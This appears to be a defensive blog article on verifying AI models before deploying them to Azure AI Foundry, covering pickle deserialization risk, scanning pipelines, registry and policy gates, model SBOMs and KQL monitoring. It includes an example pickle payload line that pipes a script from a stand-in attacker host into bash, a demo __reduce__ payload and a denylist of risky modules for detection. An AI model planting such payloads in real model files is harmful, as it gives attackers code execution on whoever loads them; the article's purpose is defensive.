Secure AI Supply Chain: Model Verification for Azure AI...

The Model That Called Home on First Load

A healthcare analytics team needed a specialized medical NLP model for their Azure AI Foundry RAG pipeline. A senior data scientist found a fine-tuned model on Hugging Face with strong benchmark scores, pulled it through the Foundry model catalog, and deployed it as a managed online endpoint. Within four hours, the endpoint's managed identity had enumerated every secret in the hub's connected Key Vault. The model's config.json contained a serialized pickle object in a custom callback that executed on model load, not during inference. The team's content filters, prompt shields, and rate limits were irrelevant because the attack happened before a single inference request was processed.

This is not a theoretical scenario. Researchers at JFrog, HiddenLayer, and Trail of Bits have documented hundreds of models on public registries containing malicious payloads embedded in pickle files, safetensors metadata, or custom tokenizer code. The Azure AI Foundry security guide covers the threat model at the platform level. This article is the operational playbook for the supply chain layer: how to verify, scan, gate, and monitor every model before it reaches your Foundry compute.

Why AI Model Supply Chains Are Different from Software Supply Chains

Software supply chain security has mature tooling: SBOMs, signed packages, provenance attestations (SLSA), and vulnerability databases (CVE/NVD). AI model supply chains have almost none of that infrastructure in production today.

The fundamental difference is the artifact format. A Python package is source code you can audit. A model weight file is a binary blob that contains learned parameters, but the serialization format can also contain executable code. Python's pickle module is the most notorious example: it deserializes arbitrary Python objects, which means loading a pickle file can execute arbitrary code. But pickle is not the only vector.
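To make the risk concrete, the following minimal sketch shows that unpickling invokes whatever callable the file names. The `Payload` class is hypothetical, and the callable is the harmless built-in `len`; a real attack would substitute something like `os.system`.

```python
import pickle


class Payload:
    """Hypothetical stand-in for an object hidden inside a model checkpoint."""

    def __reduce__(self):
        # pickle records "call len('attacker-controlled')" instead of object state.
        return (len, ("attacker-controlled",))


blob = pickle.dumps(Payload())

# Loading runs the recorded call. The result is whatever the callable returned,
# not a Payload instance, and the loader never needs the Payload class itself.
loaded = pickle.loads(blob)
print(type(loaded).__name__, loaded)
```

The loader has no chance to inspect the object first: the call happens as part of deserialization.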

Attack Vectors in Model Artifacts

Vector	File Types	Execution Trigger	Detection Difficulty
Pickle deserialization	`.pkl`, `.pt`, `.bin`	Model load (`torch.load()`)	Medium: scanners exist
Custom tokenizer code	`tokenizer.py`, `__init__.py`	Tokenizer initialization	Low: visible in source
Safetensors metadata injection	`.safetensors`	Metadata parsing in custom loaders	High: often trusted as safe
ONNX custom operators	`.onnx`	Runtime operator registration	High: binary inspection needed
Notebook execution	`.ipynb` in model repo	Manual execution by data scientist	Low: but relies on human caution
Model card script injection	`README.md` with HTML/JS	Rendered in web UI	Medium: CSP should block

The safetensors format was created specifically to avoid pickle's code execution risk. It stores tensors as raw bytes with a JSON header and does not support arbitrary object serialization. However, some model loading pipelines read safetensors metadata and pass values to eval() or exec() in custom preprocessing code. The format is safe; the code around it might not be.
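As a rough illustration of auditing that metadata, the sketch below parses the safetensors header directly (an 8-byte little-endian length followed by that many bytes of JSON) and flags metadata values that look like code. The `SUSPICIOUS` pattern list and the helper names are assumptions for illustration, not part of the safetensors library.

```python
import json
import re
import struct

# Illustrative patterns only; a real rule set would be broader.
SUSPICIOUS = re.compile(r"(__import__|eval\(|exec\(|os\.system|subprocess)")


def read_safetensors_header(data: bytes) -> dict:
    """Parse the JSON header: 8-byte little-endian length, then the JSON bytes."""
    if len(data) < 8:
        raise ValueError("file too short to contain a header length")
    (header_len,) = struct.unpack("<Q", data[:8])
    if header_len > len(data) - 8:
        raise ValueError("declared header length exceeds file size")
    return json.loads(data[8 : 8 + header_len].decode("utf-8"))


def suspicious_metadata(data: bytes) -> dict:
    """Return metadata entries whose values look like code rather than labels."""
    metadata = read_safetensors_header(data).get("__metadata__", {})
    return {k: v for k, v in metadata.items() if SUSPICIOUS.search(str(v))}


def build_example(metadata: dict) -> bytes:
    """Hand-build a tiny safetensors blob holding one 2-element float32 tensor."""
    header = {
        "__metadata__": metadata,
        "w": {"dtype": "F32", "shape": [2], "data_offsets": [0, 8]},
    }
    raw = json.dumps(header).encode("utf-8")
    return struct.pack("<Q", len(raw)) + raw + bytes(8)
```

A pattern match here is only a signal for human review; the real fix is removing `eval()` or `exec()` from the loading code.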

Model Provenance: Knowing What You Are Deploying

Provenance answers three questions: who created this model, what data was it trained on, and has it been modified since creation?

Hugging Face Model Cards and Signatures

Hugging Face introduced commit signing for model repositories in 2024. Models signed with GPG keys show a verified badge on the model card. In practice, fewer than 5% of community models are signed. Microsoft-published models in the Foundry catalog are signed, but models from the broader Hugging Face ecosystem that appear in Foundry's catalog are not necessarily verified.

Check signature status before pulling any model:

# Check if a model repo has signed commits
huggingface-cli repo info <org>/<model-name> --revision main

# Verify GPG signature on a specific commit
git -C <local-model-dir> log --show-signature -1
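For use in a pipeline, the same check can be scripted. This is a minimal sketch that assumes `git` is on the PATH and the model repo is already cloned locally. It relies on git's `%G?` format placeholder, and the function names are hypothetical.

```python
import subprocess

# Meaning of git's %G? placeholder, as described in the git-log documentation.
SIGNATURE_STATUS = {
    "G": "good signature",
    "B": "bad signature",
    "U": "good signature, unknown validity",
    "X": "good signature, expired",
    "Y": "good signature, made by an expired key",
    "R": "good signature, made by a revoked key",
    "E": "cannot be checked (for example, missing key)",
    "N": "no signature",
}


def is_trusted(status_code: str) -> bool:
    """Only a fully valid signature passes; every other status fails closed."""
    return status_code == "G"


def head_signature_status(repo_dir: str) -> str:
    """Return the %G? status code for the HEAD commit of a local clone."""
    result = subprocess.run(
        ["git", "-C", repo_dir, "log", "-1", "--format=%G?"],
        check=True,
        capture_output=True,
        text=True,
    )
    return result.stdout.strip()
```

Treating `U` (valid signature from a key you have not marked as trusted) as a failure is a deliberate choice here: a signature only proves provenance if you trust the signer.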

Model Cards as Security Documentation

A model card should tell you:

Training data sources and any known biases
Fine-tuning methodology and hyperparameters
Intended use cases and out-of-scope applications
Known limitations and failure modes

From a security perspective, the critical field is the training data declaration. If a model was fine-tuned on data that includes your industry's regulated content (HIPAA, PCI, GDPR-scoped data), deploying it may create compliance obligations even if you did not supply the training data yourself.

Building an Internal Model Registry

The single most impactful control for AI supply chain security is never deploying directly from a public registry to production. Every model goes through an internal registry first.

# Create a dedicated Azure Container Registry for model artifacts
az acr create \
  --name prodmodelregistry \
  --resource-group rg-ai-platform \
  --sku Premium \
  --admin-enabled false \
  --public-network-enabled false

# Import a verified model from Hugging Face to internal registry
# After scanning (see next section), push the model artifact
az acr import \
  --name prodmodelregistry \
  --source docker.io/library/model-artifact:v1.2.0 \
  --image verified-models/medical-nlp:v1.2.0-scanned

Tag every imported model with scan results metadata:

# Add scan metadata as OCI annotations
oras push prodmodelregistry.azurecr.io/verified-models/medical-nlp:v1.2.0-scanned \
  --annotation "security.scan.tool=modelscan" \
  --annotation "security.scan.result=clean" \
  --annotation "security.scan.date=2026-06-23" \
  --annotation "security.provenance.source=huggingface/medical-nlp-v1" \
  --annotation "security.provenance.signer=microsoft" \
  ./model-weights/
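If the push is scripted, the annotation flags can be generated from the scan record rather than typed by hand. The sketch below is one way to do that; the `scan_annotations` helper and the `ALLOWED_RESULTS` vocabulary are assumptions, not something ORAS defines.

```python
from datetime import date

ALLOWED_RESULTS = {"clean", "flagged"}  # assumed vocabulary, not an ORAS requirement


def scan_annotations(tool: str, result: str, scan_date: date, source: str) -> list[str]:
    """Build repeated --annotation arguments for an `oras push` command line."""
    if result not in ALLOWED_RESULTS:
        raise ValueError(f"unexpected scan result: {result!r}")
    pairs = {
        "security.scan.tool": tool,
        "security.scan.result": result,
        "security.scan.date": scan_date.isoformat(),
        "security.provenance.source": source,
    }
    args: list[str] = []
    for key, value in pairs.items():
        args += ["--annotation", f"{key}={value}"]
    return args
```

Rejecting unknown result values keeps a typo such as `claen` from producing a tag that no policy will ever match.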

Automated Model Scanning Pipeline

Manual review does not scale. A production AI platform needs automated scanning at two gates: when a model enters the internal registry, and before it deploys to a Foundry endpoint.

Scanning Tools Comparison

Tool	What It Detects	Format Support	Integration
ModelScan (Protect AI)	Pickle exploits, unsafe ops	PyTorch, TF, Keras, ONNX	CLI, Python API, CI/CD
Fickling (Trail of Bits)	Pickle opcode analysis	Pickle files only	CLI, Python API
NB Defense	Notebook credentials, PII	Jupyter notebooks	CLI, pre-commit hook
Safetensors Audit	Metadata injection patterns	Safetensors	Python script
Semgrep (custom rules)	Unsafe model loading patterns	Python source	CI/CD, IDE

ModelScan is the most comprehensive option for Azure deployments because it handles the formats Foundry actually uses: PyTorch checkpoints, ONNX exports, and TensorFlow SavedModels.

GitHub Actions Scanning Pipeline

```yaml
name: Model Security Scan
on:
  push:
    paths:
      - 'models/**'
  workflow_dispatch:
    inputs:
      model_path:
        description: 'Path to model artifact'
        required: true

jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Install scanning tools
        run: |
          pip install modelscan fickling

      - name: Run ModelScan
        run: |
          modelscan scan -p ${{ inputs.model_path || 'models/' }} \
            --output-format json \
            --output-file scan-results.json

      - name: Run Fickling on pickle files
        run: |
          find ${{ inputs.model_path || 'models/' }} \
            -name "*.pkl" -o -name "*.pt" -o -name "*.bin" | \
          while read f; do
            echo "Scanning: $f"
            fickling --check-safety "$f"
          done

      - name: Evaluate scan results
        run: |
          # Quoted heredoc so the shell leaves the Python quotes untouched
          python3 - <<'EOF'
          import json, sys
          results = json.load(open('scan-results.json'))
          issues = results.get('issues', [])
          critical = [i for i in issues if i['severity'] in ('CRITICAL', 'HIGH')]
          if critical:
              print(f'BLOCKED: {len(critical)} critical/high issues found')
              for i in critical:
                  print(f'  - {i["description"]} in {i["source"]}')
              sys.exit(1)
          print(f'PASSED: {len(issues)} lower-severity issues, 0 critical/high')
          EOF

      - name: Push to ACR if clean
        if: success()
        run: |
          az acr login --name prodmodelregistry
          # Tag and push verified model
```

<h3 id="pickle-deserialization-the-specific-threat" class="text-xl font-bold mt-6 mb-3 text-gray-900">Pickle Deserialization: The Specific Threat</h3>
Python's pickle module uses opcodes to reconstruct objects. The <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">REDUCE</code> opcode calls a callable with arguments, which means a pickle file can encode <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">os.system("curl attacker.com/shell.sh | bash")</code> and it will execute when <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">pickle.load()</code> runs. PyTorch's <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load()</code> is built on pickle, and before PyTorch 2.6 it unpickled arbitrary objects by default.

The defense is straightforward: never call <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load()</code> on untrusted files without restricting what it may unpickle. Use <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load(weights_only=True)</code> (available since PyTorch 1.13 and the default since PyTorch 2.6) or convert to safetensors format before deployment.

```python
import torch
from safetensors.torch import save_file, load_file

# UNSAFE on PyTorch < 2.6 (weights_only defaults to False): executes arbitrary code in pickle
model = torch.load("untrusted_model.pt")

# SAFE: only loads tensor data, rejects arbitrary objects
model = torch.load("untrusted_model.pt", weights_only=True)

# SAFEST: convert to safetensors format in quarantine environment
# In quarantine VM (isolated, no network, disposable)
state_dict = torch.load("untrusted_model.pt", weights_only=True)
save_file(state_dict, "verified_model.safetensors")

# In production pipeline
model_weights = load_file("verified_model.safetensors")
```
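Static scanners work by reading pickle opcodes without executing them. The sketch below illustrates the idea with the standard library's `pickletools`. It is a simplified heuristic, not how ModelScan or Fickling are implemented, and the denylists and function names are illustrative assumptions.

```python
import pickle
import pickletools

# Illustrative denylists; real scanners maintain much larger rule sets.
RISKY_MODULES = {"os", "posix", "nt", "subprocess", "socket", "sys"}
RISKY_BUILTINS = {"eval", "exec", "compile", "__import__", "getattr", "open"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}


def is_risky(module: str, name: str) -> bool:
    root = module.split(".")[0]
    if root in ("builtins", "__builtin__"):
        return name in RISKY_BUILTINS
    return root in RISKY_MODULES


def find_risky_imports(data: bytes) -> list[str]:
    """List risky 'module.name' references without executing the pickle."""
    findings, recent_strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in STRING_OPS:
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Protocols 0-3: pickletools reports the argument as "module name".
            module, _, name = arg.partition(" ")
            if is_risky(module, name):
                findings.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocol 4+: module and name are usually the two strings pushed last.
            # Heuristic: strings fetched back from the memo are not tracked here.
            module, name = recent_strings[-2], recent_strings[-1]
            if is_risky(module, name):
                findings.append(f"{module}.{name}")
    return findings


class EvalPayload:
    """Hypothetical malicious object, used only to build a test pickle."""

    def __reduce__(self):
        return (eval, ("1+1",))


def demo_payload(protocol: int = 4) -> bytes:
    # dumps() only records the call; nothing is executed until loads().
    return pickle.dumps(EvalPayload(), protocol=protocol)
```

Calling `find_risky_imports(demo_payload())` reports the `eval` reference, while a pickle of plain dicts and floats yields an empty list. A denylist can always be evaded by a callable it does not know about, which is why converting to safetensors remains the stronger control.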

<h2 id="azure-policy-gates-for-foundry-model-deployments" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Azure Policy Gates for Foundry Model Deployments</h2>
Azure Policy is your enforcement layer. Scanning catches known threats; policy prevents unscanned models from deploying at all.
<h3 id="deny-untagged-model-deployments" class="text-xl font-bold mt-6 mb-3 text-gray-900">Deny Untagged Model Deployments</h3>
Create a custom policy that denies any model deployment that lacks a clean scan result tag:

```json
{
  "mode": "All",
  "policyRule": {
    "if": {
      "allOf": [
        {
          "field": "type",
          "equals": "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments"
        },
        {
          "not": {
            "field": "tags['security.scan.result']",
            "equals": "clean"
          }
        }
      ]
    },
    "then": {
      "effect": "deny"
    }
  },
  "parameters": {}
}
```
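A pipeline can mirror this rule locally so that a missing tag fails fast, before the deployment request ever reaches Azure. The sketch below is an approximation under stated assumptions: `would_be_denied` is a hypothetical helper, string matching is simplified to exact comparison, and Azure Policy itself remains the authoritative evaluator.

```python
DEPLOYMENT_TYPE = "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments"
SCAN_TAG = "security.scan.result"


def would_be_denied(resource_type: str, tags: dict) -> bool:
    """Approximate the rule: deny deployments whose scan tag is not 'clean'."""
    is_deployment = resource_type == DEPLOYMENT_TYPE
    has_clean_tag = tags.get(SCAN_TAG) == "clean"
    return is_deployment and not has_clean_tag
```

For example, `would_be_denied(DEPLOYMENT_TYPE, {})` is true, because an absent tag is treated the same as a failing one.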

<h3 id="restrict-model-sources-to-internal-registry" class="text-xl font-bold mt-6 mb-3 text-gray-900">Restrict Model Sources to Internal Registry</h3>

```bash
# Assign policy to deny model deployments from external registries
az policy assignment create \
  --name 'require-internal-model-registry' \
  --display-name 'Require models from internal ACR only' \
  --policy '' \
  --scope '/subscriptions//resourceGroups/rg-ai-platform' \
  --params '{"allowedRegistries": {"value": ["prodmodelregistry.azurecr.io"]}}'
```

<h3 id="separate-hubs-for-experimentation-vs-production" class="text-xl font-bold mt-6 mb-3 text-gray-900">Separate Hubs for Experimentation vs. Production</h3>
The <a href="/blog/azure-ai-foundry-security-threat-model-rbac-governance" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">AI Foundry security guide</a> recommends hub separation. For supply chain security specifically, the pattern is:
<ol class="list-decimal pl-6 mb-4 space-y-2">
<li class="text-gray-600"><strong>Sandbox hub</strong>: data scientists can pull any model from the catalog. No production data access. Managed network set to <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowInternetOutbound</code>. Models deployed here are for evaluation only.</li>
<li class="text-gray-600"><strong>Staging hub</strong>: only models from the internal ACR can be deployed. Automated scanning gate runs before import. Connected to staging data.</li>
<li class="text-gray-600"><strong>Production hub</strong>: <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowOnlyApprovedOutbound</code> network isolation. Azure Policy denies any model deployment without scan tags. Connected to production data stores with Purview integration.</li>
</ol>
<h2 id="model-sbom-tracking-what-is-inside-your-models" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Model SBOM: Tracking What Is Inside Your Models</h2>
A Software Bill of Materials (SBOM) for models is an emerging practice. Unlike software SBOMs (which list packages and versions), a model SBOM documents:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600">Base model architecture and version</li>
<li class="text-gray-600">Training dataset references (not the data itself)</li>
<li class="text-gray-600">Fine-tuning parameters and methodology</li>
<li class="text-gray-600">Dependencies required for inference (Python packages, CUDA version)</li>
<li class="text-gray-600">Serialization format and any custom operators</li>
</ul>
<h3 id="generating-a-model-sbom" class="text-xl font-bold mt-6 mb-3 text-gray-900">Generating a Model SBOM</h3>

```python
import hashlib
import json
import os
from datetime import datetime, timezone


def compute_sha256(path, chunk_size=1024 * 1024):
    """Hash a file in chunks so large weight files are never fully in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def generate_model_sbom(model_name, model_path, base_model, training_info):
    sbom = {
        "sbomVersion": "1.0",
        "modelName": model_name,
        "generatedAt": datetime.now(timezone.utc).isoformat(),
        "provenance": {
            "baseModel": base_model,
            "source": training_info.get("source", "internal"),
            "commitHash": training_info.get("commit_hash"),
            "signatureVerified": training_info.get("signed", False),
        },
        "artifacts": [],
        "dependencies": [],
        "securityMetadata": {
            "scanTool": "modelscan",
            "scanDate": None,
            "scanResult": None,
            "format": "safetensors",
            "picklePresent": False,
        },
    }

    # Enumerate model files
    for root, dirs, files in os.walk(model_path):
        for f in files:
            fpath = os.path.join(root, f)
            sbom["artifacts"].append({
                "filename": f,
                "size": os.path.getsize(fpath),
                "sha256": compute_sha256(fpath),
                "format": f.split(".")[-1],
            })
            # Flag formats that are typically pickle-based
            if f.endswith((".pkl", ".pt", ".bin")):
                sbom["securityMetadata"]["picklePresent"] = True

    return sbom
```

Store the SBOM alongside the model artifact in your internal ACR. When a deployment is created in Foundry, your CI/CD pipeline can pull the SBOM and verify that the scan date is recent and the result is clean before proceeding.
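That deployment-time check might look like the following minimal sketch. It assumes the SBOM layout generated above, with `scanDate` stored as an ISO 8601 string; the 30-day window and the rule that pickle-format artifacts block deployment are illustrative policy choices, not requirements from any tool.

```python
from datetime import datetime, timedelta, timezone


def sbom_allows_deploy(sbom: dict, now: datetime, max_age_days: int = 30) -> tuple[bool, str]:
    """Return (allowed, reason) based on the SBOM's securityMetadata section."""
    meta = sbom.get("securityMetadata", {})
    if meta.get("scanResult") != "clean":
        return False, "scan result is not clean"
    if meta.get("picklePresent"):
        return False, "pickle-format artifact present"
    scan_date = meta.get("scanDate")
    if not scan_date:
        return False, "scan date missing"
    scanned_at = datetime.fromisoformat(scan_date)
    if scanned_at.tzinfo is None:
        # Assumption: naive timestamps in the SBOM are UTC.
        scanned_at = scanned_at.replace(tzinfo=timezone.utc)
    if now - scanned_at > timedelta(days=max_age_days):
        return False, "scan is older than the allowed window"
    return True, "ok"
```

Pass a timezone-aware `now`, for example `datetime.now(timezone.utc)`. Returning a reason alongside the decision makes pipeline failures easier to diagnose.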
<h2 id="runtime-monitoring-detecting-compromised-models-post-deployment" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Runtime Monitoring: Detecting Compromised Models Post-Deployment</h2>
Even with pre-deployment scanning, runtime monitoring catches behaviors that static analysis misses: models that phone home during inference, models that leak training data through carefully crafted prompts, or models that behave differently after a specific number of requests.
<h3 id="kql-anomalous-outbound-connections-from-foundry-compute" class="text-xl font-bold mt-6 mb-3 text-gray-900">KQL: Anomalous Outbound Connections from Foundry Compute</h3>

```kusto
AzureDiagnostics
| where ResourceType == "WORKSPACES"
| where Category == "ComputeInstanceEvent" or Category == "OnlineEndpointTraffic"
| where properties_s contains "outbound" or properties_s contains "egress"
| extend DestinationIP = extract("destinationAddress=([^,]+)", 1, properties_s)
| where DestinationIP !startswith "10." and DestinationIP !startswith "172.16."
| summarize ConnectionCount = count(), FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated)
    by DestinationIP, ResourceId
| where ConnectionCount > 10
| order by ConnectionCount desc
```

Alert on any outbound connection from a managed online endpoint to an IP address outside your known Azure service ranges. In <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowOnlyApprovedOutbound</code> mode, these connections should be blocked, but the alert catches misconfigurations.
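When triaging these alerts outside of Log Analytics, the same classification can be done with proper CIDR matching. The sketch below uses Python's `ipaddress` module; the `APPROVED_NETWORKS` list is a hypothetical placeholder for whatever ranges your approved outbound rules actually contain.

```python
import ipaddress

# Hypothetical allowlist; replace with the ranges from your approved outbound rules.
APPROVED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
]


def is_unexpected_destination(ip: str, approved=APPROVED_NETWORKS) -> bool:
    """True when the destination falls outside every approved network."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in network for network in approved)
```

A CIDR check covers the whole 172.16.0.0/12 block (172.16.x.x through 172.31.x.x), which a string-prefix match on `172.16.` does not.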

<h3 id="kql-model-deployment-from-non-approved-source" class="text-xl font-bold mt-6 mb-3 text-gray-900">KQL: Model Deployment from Non-Approved Source</h3>

```kusto
AzureActivity
| where OperationNameValue == "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments/write"
| where ActivityStatus == "Succeeded"
| extend DeploymentDetails = parse_json(Properties)
| extend ModelSource = tostring(DeploymentDetails.modelSource)
| where ModelSource !contains "prodmodelregistry.azurecr.io"
| project TimeGenerated, Caller, ResourceGroup, ModelSource, ResourceId
| order by TimeGenerated desc
```

<h3 id="inference-payload-anomaly-detection" class="text-xl font-bold mt-6 mb-3 text-gray-900">Inference Payload Anomaly Detection</h3>
Monitor for unusual inference patterns that indicate model probing or extraction attempts:

```kusto
// Detect potential model extraction: high volume structured queries from single identity
AMLOnlineEndpointConsoleLog
| where Message contains "request_id"
| extend RequestCaller = extract("caller=([^,]+)", 1, Message)
| summarize RequestCount = count(), AvgLatency = avg(DurationMs)
    by RequestCaller, bin(TimeGenerated, 1h)
| where RequestCount > 500
| order by RequestCount desc
```
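The same hourly bucketing can be prototyped offline against exported logs before committing to an alert threshold. This is a minimal sketch that assumes the records are already parsed into `(caller, timestamp)` pairs; the function name is hypothetical.

```python
from collections import Counter
from datetime import datetime


def high_volume_callers(records, threshold=500):
    """Count requests per (caller, hour) and keep buckets above the threshold.

    records: iterable of (caller, datetime) pairs.
    """
    counts = Counter(
        (caller, ts.replace(minute=0, second=0, microsecond=0))
        for caller, ts in records
    )
    return {bucket: n for bucket, n in counts.items() if n > threshold}
```

Replaying a week of normal traffic through this function gives a baseline for whether 500 requests per hour is a sensible cutoff for a given endpoint.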

<h2 id="supply-chain-security-for-fine-tuned-models" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Supply Chain Security for Fine-Tuned Models</h2>
Fine-tuning introduces a second supply chain risk: the training data. A model fine-tuned on poisoned data produces biased or manipulated outputs without any malicious code in the model files themselves. This is a data integrity attack, not a code execution attack, and it bypasses every scanning tool discussed above.
<h3 id="mitigations-for-training-data-integrity" class="text-xl font-bold mt-6 mb-3 text-gray-900">Mitigations for Training Data Integrity</h3>
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600">Store all training datasets in versioned blob storage with soft delete enabled</li>
<li class="text-gray-600">Require signed commits for any changes to training data repositories</li>
<li class="text-gray-600">Run automated data validation checks: schema validation, statistical distribution checks, and outlier detection before fine-tuning jobs</li>
<li class="text-gray-600">Log the exact dataset version (commit hash or blob snapshot ID) used for each fine-tuning run in the model SBOM</li>
<li class="text-gray-600">Use <a href="/blog/microsoft-purview-information-protection-setup-guide" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">Microsoft Purview</a> sensitivity labels on training data to enforce access controls</li>
</ul>
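As one example of a statistical distribution check, the sketch below compares the label mix of a candidate dataset against a trusted baseline using total variation distance. The function names and the 0.1 threshold are illustrative assumptions. A check like this catches crude label flipping, not carefully targeted poisoning.

```python
from collections import Counter


def label_distribution(labels) -> dict:
    """Map each label to its share of the dataset."""
    counts = Counter(labels)
    total = sum(counts.values())
    if total == 0:
        raise ValueError("cannot compute a distribution over an empty dataset")
    return {label: n / total for label, n in counts.items()}


def total_variation_distance(p: dict, q: dict) -> float:
    """Half the sum of absolute differences between two label distributions."""
    keys = set(p) | set(q)
    return 0.5 * sum(abs(p.get(k, 0.0) - q.get(k, 0.0)) for k in keys)


def distribution_shifted(baseline_labels, candidate_labels, threshold=0.1) -> bool:
    """True when the candidate's label mix drifts past the threshold."""
    distance = total_variation_distance(
        label_distribution(baseline_labels),
        label_distribution(candidate_labels),
    )
    return distance > threshold
```

A run that trips the threshold should block the fine-tuning job until someone explains the shift.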
<h3 id="federated-credentials-for-ci-cd-model-pipelines" class="text-xl font-bold mt-6 mb-3 text-gray-900">Federated Credentials for CI/CD Model Pipelines</h3>
Your model deployment pipeline should authenticate to Azure using <a href="/blog/flexible-federated-identity-credentials-entra-github-terraform" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">workload identity federation</a>, not stored secrets. A compromised secret in a CI/CD pipeline gives an attacker persistent access to deploy arbitrary models. Federated credentials are short-lived and scoped to the specific pipeline run.

```bash
# Create federated credential for GitHub Actions model deployment pipeline
az ad app federated-credential create \
  --id \
  --parameters '{
    "name": "model-deploy-pipeline",
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:org/ai-models:environment:production",
    "audiences": ["api://AzureADTokenExchange"]
  }'
```

Integration with Defender for Cloud

Defender for Cloud provides AI workload protection that complements the supply chain controls in this guide. The coverage as of mid-2026:

Control	Defender for Cloud	Supply Chain Pipeline
Pickle exploit detection	No	Yes (ModelScan)
Anomalous inference volume	Yes	No (runtime only)
Model provenance verification	No	Yes (SBOM + signatures)
Prompt injection detection	Yes	No (not supply chain)
Unauthorized model deployment	Partial (activity alerts)	Yes (Azure Policy deny)
Training data integrity	No	Yes (versioning + Purview)
Container vulnerability in model endpoint	Yes	Partial (base image scan)

The two layers are complementary. Do not rely on Defender for Cloud alone for supply chain threats, and do not rely on your scanning pipeline alone for runtime threats.

Hardening Checklist

[ ] Internal model registry (ACR) deployed with private endpoint and admin access disabled
[ ] No direct deployments from public model catalogs to production hubs: Azure Policy enforced
[ ] ModelScan integrated into CI/CD pipeline scanning all model artifacts before registry push
[ ] Pickle files blocked or converted to safetensors format before entering internal registry
[ ] Model SBOM generated and stored alongside every model artifact in ACR
[ ] Hub separation enforced: sandbox (open catalog) / staging (internal ACR) / production (policy-gated)
[ ] Federated credentials used for all CI/CD model deployment pipelines: no stored secrets
[ ] Managed network isolation set to AllowOnlyApprovedOutbound on production hubs
[ ] KQL alerts deployed for non-approved model sources, anomalous outbound connections, and high-volume inference
[ ] Training data versioned with blob snapshots and Purview sensitivity labels applied
[ ] Model provenance (commit signatures) verified before any model enters the internal registry
[ ] Defender for Cloud AI workload protection enabled alongside the supply chain scanning pipeline

Frequently Asked Questions

Why is pickle deserialization dangerous for AI model files?

Python's pickle module reconstructs arbitrary Python objects from serialized bytes, including objects that execute code on instantiation. The REDUCE opcode in the pickle protocol calls any Python callable with supplied arguments, which means a pickle file can encode os.system("malicious command") and it executes the moment pickle.load() or torch.load() runs. Because PyTorch uses pickle by default for model checkpoints (.pt, .bin files), loading an untrusted model file is functionally equivalent to running an untrusted script. The mitigation is to use torch.load(weights_only=True) or convert all models to safetensors format, which stores only tensor data without code execution capability.

How does an internal model registry prevent supply chain attacks in Azure AI Foundry?

An internal Azure Container Registry acts as a trust boundary between public model sources and your production Foundry compute. Every model from the public Hugging Face catalog or Foundry model registry must first be pulled into a quarantine environment, scanned with tools like ModelScan for malicious payloads, converted to safe serialization formats, and tagged with scan metadata before being pushed to the internal ACR. Azure Policy on your production Foundry hub then denies any model deployment that does not originate from the internal registry or lacks clean scan tags. This two-gate approach (scan before registry entry, policy before deployment) ensures no unverified model reaches production compute.

What is a model SBOM and why does it matter for AI security?

A Model Software Bill of Materials documents the provenance and composition of a machine learning model: the base architecture, training data references, fine-tuning methodology, inference dependencies, serialization format, and security scan results. Unlike software SBOMs that track package dependencies, model SBOMs track the data and training lineage that determines model behavior. This matters for security because a model fine-tuned on poisoned data produces manipulated outputs without any detectable malicious code. The SBOM provides the audit trail needed to trace a model's outputs back to its training inputs when investigating incidents.

Can safetensors files contain malicious code?

The safetensors format itself cannot contain executable code because it stores only raw tensor bytes with a JSON metadata header. However, the loading code around safetensors files can introduce risk. If a custom model loading pipeline reads safetensors metadata and passes values to eval() or exec(), the metadata becomes an injection vector. The defense is twofold: use the standard safetensors library's load_file() function (which does not execute metadata), and audit any custom model loading code for unsafe deserialization patterns using Semgrep or similar static analysis tools.

Secure AI Supply Chain: Verifying Models Before Deploying to Azure AI Foundry


Idan Ohayon
